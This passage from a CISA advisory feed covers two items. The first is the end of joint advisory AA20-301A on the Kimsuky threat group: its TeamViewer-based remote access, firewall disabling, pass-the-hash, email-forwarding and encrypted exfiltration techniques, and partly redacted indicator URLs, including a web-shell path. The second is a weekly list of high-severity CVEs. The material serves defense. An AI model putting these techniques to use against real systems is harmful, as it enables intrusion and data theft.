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” style=”width: 637px; height: 321px;” /></font></font></span></p>


<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Figure 4: Python Script targeting MacOS</em> [57]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Command and Control</h4>

<p>Kimsuky has used a modified TeamViewer client, version 5.0.9104, for <em>Command and Control</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0011/”>TA0011</a>] (<em>Remote Access Software</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1219/”>T1219</a>]). During the initial infection, the service “Remote Access Service” is created and adjusted to execute <code>C:\Windows\System32\vcmon.exe</code> at system startup (<em>Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1547/001/”>T1547.001</a>]). Every time <code>vcmon.exe</code> is executed, it disables the firewall by zeroing out Registry values (<em>Impair Defenses: Disable or Modify System Firewall</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1562/004/”>T1562.004</a>]). The program then modifies the TeamViewer Registry settings by changing the <code>TeamViewer</code> strings in TeamViewer components. The launcher then configures several Registry values, including <code>SecurityPasswordAES</code>, that control how the remote access tool will work. The <code>SecurityPasswordAES</code> Registry value represents a hash of the password used by a remote user to connect to TeamViewer Client (<em>Use Alternate Authentication Material: Pass the Hash</em> [<a href=”https://attack.mitre.org/techniques/T1550/002/”>T1550.002</a>]). This way, the attackers set a pre-shared authentication value to have access to the TeamViewer Client. The attacker will then execute the TeamViewer client <code>netsvcs.exe</code>.[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>58</a>]</p>

<p>Kimsuky has been using a consistent format. In the URL used recently—<code>express[.]php?op=1</code>—there appears to be an option range from 1 to 3.[59]</p>

<h4 style=”margin-top: 8px; margin-bottom: 8px;”>Exfiltration</h4>

<p>Open-source reporting from cybersecurity companies describes two different methods Kimsuky has used to exfiltrate stolen data: via email or through an RC4 key generated as an MD5 hash or a randomly generated 117-byte buffer (<em>Exfiltration</em> [<a href=”https://attack.mitre.org/versions/v7/tactics/TA0010/”>TA0010</a>]).</p>

<p>There was no indication that the actor destroyed computers during the observed exfiltrations, suggesting Kimsuky’s intention is to steal information, not to disrupt computer networks. Kimsuky’s preferred method for sending or receiving exfiltrated information is through email, with their malware on the victim machine encrypting the data before sending it to a C2 server (<em>Archive Collected Data</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1560″>T1560</a>]). Kimsuky also sets up auto-forward rules within a victim’s email account (<em>Email Collection: Email Forwarding Rule</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1114/003/”>T1114.003</a>]).</p>

<p>Kimsuky also uses an RC4 key generated as an MD5 hash or a randomly generated 117-byte buffer to exfiltrate stolen data. The data is sent RSA-encrypted (<em>Encrypted Channel: Symmetric Cryptography</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1573/001″>T1573.001</a>]). Kimsuky’s malware constructs an 1120-bit public key and uses it to encrypt the 117-byte buffer. The resulting data file is saved in <code>C:\Program Files\Common Files\System\Ole DB</code> (<em>Data Staged: Local Data Staging</em> [<a href=”https://attack.mitre.org/versions/v7/techniques/T1074/001″>T1074.001</a>]).[<a href=”https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/”>60</a>]</p>
<h3>Mitigations</h3><h4 style=”margin-top: 8px; margin-bottom: 8px;”>Indicators of Compromise</h4>

<p style=”margin-top: 8px; margin-bottom: 8px;”><font color=”#000000″><font size=”3″>Kimsuky has used the domains listed in table 1 to carry out its objectives:</font></font></p>

<p style=”margin-bottom: 8px;”><font color=”#000000″><font size=”3″>For a downloadable copy of IOCs, see <a href=”https://us-cert.cisa.gov/sites/default/files/publications/AA20-301A.stix.xml”>AA20-301A.stix</a>.</font></font></p>

<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Table 1: Domains used by Kimsuky</em></p>


<p class=”text-align-center” style=”margin-top: 8px; margin-bottom: 13px;”><em>Table 2: Redacted domains used by Kimsuky</em></p>

<table style=”border: medium none; width: 737px; border-collapse: collapse; margin-left: auto; margin-right: auto;”>
<tbody>
<tr>
<td style=”padding: 0in 7px; border: 1px solid black; border-image: none; width: 200px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?van=101</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentColor; padding: 0in 7px; width: 230px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?v%20an=101</code></p>
</td>
<td style=”border-width: 1px 1px 1px medium; border-style: solid solid solid none; border-color: black black black currentcolor; padding: 0in 7px; width: 261px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/dwn[.]php?van=102</code></p>
</td>
</tr>
<tr>
<td style=”border-width: medium 1px 1px; border-style: none solid solid; border-color: currentColor black black; padding: 0in 7px; width: 200px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/home/up[.]php?id=NQDPDE</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentColor black black currentColor; padding: 0in 7px; width: 230px;” valign=”top”>
<p style=”margin-top: 8px;”><code>[REDACTED]/test/Update[.]php?wShell=201</code></p>
</td>
<td style=”border-width: medium 1px 1px medium; border-style: none solid solid none; border-color: currentcolor black black currentcolor; padding: 0in 7px; width: 261px;” valign=”top”>
<p style=”margin-bottom: 8px;”>&nbsp;</p>
</td>
</tr>
</tbody>
</table>
<h3>Contact Information</h3><p style=”margin-top: 8px; margin-bottom: 8px;”>To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at <a href=”https://www.fbi.gov/contact-us/field-offices”>www.fbi.gov/contact-us/field</a>, or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at <a href=”mailto:CyWatch@fbi.gov”>CyWatch@fbi.gov</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at <a href=”mailto:Central@cisa.dhs.gov”>Central@cisa.dhs.gov</a>.</p>


<div class=”special_container text-align-center”><strong><em>DISCLAIMER</em></strong></div>


<div class=”special_container”>
<p><em>This information is provided “as is” for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information.</em></p>

<p><em>The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government.</em></p>
</div>

<h3>Revisions</h3>
<ul> <li>October 27, 2020: Initial Version</li> </ul>
<hr />

Vulnerability Summary for the Week of October 19, 2020

Original release date: October 26, 2020

The CISA Weekly Vulnerability Summary Bulletin is created using information from the NIST NVD. In some cases, the vulnerabilities in the Bulletin may not yet have assigned CVSS scores. Please visit NVD for updated vulnerability entries, which include CVSS scores once they are available.

 

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
acronis — cyber_backup Acronis Cyber Backup 12.5 and Cyber Protect 15 include an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory within C:\jenkins_agent\. Acronis Cyber Backup and Cyber Protect contain a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges. 2020-10-21 7.2 CVE-2020-10138
MISC
acronis — true_image Acronis True Image 2021 includes an OpenSSL component that specifies an OPENSSLDIR variable as a subdirectory within C:\jenkins_agent\. Acronis True Image contains a privileged service that uses this OpenSSL component. Because unprivileged Windows users can create subdirectories off of the system root, a user can create the appropriate path to a specially-crafted openssl.cnf file to achieve arbitrary code execution with SYSTEM privileges. 2020-10-21 7.2 CVE-2020-10139
MISC
adobe — animate Adobe Animate version 20.5 (and earlier) is affected by an out-of-bounds read vulnerability, which could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate. 2020-10-21 9.3 CVE-2020-9750
MISC
adobe — animate Adobe Animate version 20.5 (and earlier) is affected by an out-of-bounds read vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted .fla file in Animate. 2020-10-21 9.3 CVE-2020-9749
MISC
adobe — animate Adobe Animate version 20.5 (and earlier) is affected by a double free vulnerability when parsing a crafted .fla file, which could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-21 9.3 CVE-2020-9747
MISC
apple — icloud A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 7.5 CVE-2020-9895
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — ipad_os An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 14.0 and iPadOS 14.0. An application may be able to cause unexpected system termination or write kernel memory. 2020-10-16 9.3 CVE-2020-9958
MISC
apple — ipad_os A memory corruption issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, watchOS 6.2.8. A malicious application may be able to execute arbitrary code with system privileges. 2020-10-16 9.3 CVE-2020-9923
MISC
MISC
apple — ipad_os A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An application may be able to execute arbitrary code with kernel privileges. 2020-10-16 9.3 CVE-2020-9907
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved input validation. This issue is fixed in macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A remote attacker may be able to cause unexpected system termination or corrupt kernel memory. 2020-10-16 10 CVE-2020-9918
MISC
MISC
MISC
MISC
apple — mac_os_x A logic issue was addressed with improved restrictions. This issue is fixed in macOS Catalina 10.15.6. An application may be able to execute arbitrary code with kernel privileges. 2020-10-16 10 CVE-2020-9864
MISC
apple — mac_os_x An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Catalina 10.15.6. A malicious application may be able to execute arbitrary code with kernel privileges. 2020-10-16 9.3 CVE-2020-9799
MISC
apple — xcode This issue was addressed by encrypting communications over the network to devices running iOS 14, iPadOS 14, tvOS 14, and watchOS 7. This issue is fixed in iOS 14.0 and iPadOS 14.0, Xcode 12.0. An attacker in a privileged network position may be able to execute arbitrary code on a paired device during a debug session over the network. 2020-10-16 9.3 CVE-2020-9992
MISC
MISC
cisco — firepower_threat_defense A vulnerability in the SSL/TLS inspection of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 2100 Series firewalls could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to improper input validation for certain fields of specific SSL/TLS messages. An attacker could exploit this vulnerability by sending a malformed SSL/TLS message through an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition. No manual intervention is needed to recover the device after it has reloaded. 2020-10-21 7.1 CVE-2020-3562
CISCO
cisco — firepower_threat_defense A vulnerability in the ICMP ingress packet processing of Cisco Firepower Threat Defense (FTD) Software for Cisco Firepower 4110 appliances could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to incomplete input validation upon receiving ICMP packets. An attacker could exploit this vulnerability by sending a high number of crafted ICMP or ICMPv6 packets to an affected device. A successful exploit could allow the attacker to cause a memory exhaustion condition that may result in an unexpected reload. No manual intervention is needed to recover the device after the reload. 2020-10-21 7.8 CVE-2020-3571
CISCO
cisco — firepower_threat_defense A vulnerability in the packet processing functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected device. The vulnerability is due to inefficient memory management. An attacker could exploit this vulnerability by sending a large number of TCP packets to a specific port on an affected device. A successful exploit could allow the attacker to exhaust system memory, which could cause the device to reload unexpectedly. No manual intervention is needed to recover the device after it has reloaded. 2020-10-21 7.8 CVE-2020-3563
CISCO
hp — intelligent_management_center A selectusergroup expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7168
MISC
hp — intelligent_management_center A reportpage index expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7187
MISC
hp — intelligent_management_center A powershellconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7186
MISC
hp — intelligent_management_center A faultdevparasset expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7143
MISC
hp — intelligent_management_center A viewtaskresultdetailfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7176
MISC
hp — intelligent_management_center A ifviewselectpage expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7154
MISC
hp — intelligent_management_center A selviewnavcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7157
MISC
hp — intelligent_management_center A iccselectdeviceseries expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7160
MISC
hp — intelligent_management_center A reporttaskselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7161
MISC
hp — intelligent_management_center A operatorgroupselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7162
MISC
hp — intelligent_management_center A navigationto expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7163
MISC
hp — intelligent_management_center A operationselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7164
MISC
hp — intelligent_management_center A iccselectcommand expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7165
MISC
hp — intelligent_management_center A quicktemplateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7167
MISC
hp — intelligent_management_center A faultinfo_content expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7156
MISC
hp — intelligent_management_center A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7169
MISC
hp — intelligent_management_center A select expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7170
MISC
hp — intelligent_management_center A guidatadetail expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7171
MISC
hp — intelligent_management_center A templateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7172
MISC
hp — intelligent_management_center A devgroupselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7146
MISC
hp — intelligent_management_center A perfselecttask expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7158
MISC
hp — intelligent_management_center A chooseperfview expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7145
MISC
hp — intelligent_management_center A faultflasheventselectfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7189
MISC
hp — intelligent_management_center A select expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7155
MISC
hp — intelligent_management_center A iccselectdevtype expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7153
MISC
hp — intelligent_management_center A faultparasset expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7152
MISC
hp — intelligent_management_center A faulttrapgroupselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7151
MISC
hp — intelligent_management_center A faultstatchoosefaulttype expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7150
MISC
hp — intelligent_management_center A ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7149
MISC
hp — intelligent_management_center A customtemplateselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7159
MISC
hp — intelligent_management_center A userselectpagingcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7188
MISC
hp — intelligent_management_center A operatorgrouptreeselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7166
MISC
hp — intelligent_management_center A deviceselect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7190
MISC
hp — intelligent_management_center A addvsiinterfaceinfo expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24652
MISC
hp — intelligent_management_center A deployselectbootrom expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7147
MISC
hp — intelligent_management_center A iccselectdymicparam expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7175
MISC
hp — intelligent_management_center A smsrulesdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7181
MISC
hp — intelligent_management_center A ictexpertdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7180
MISC
hp — intelligent_management_center A thirdpartyperfselecttask expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7179
MISC
hp — intelligent_management_center A mediaforaction expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7178
MISC
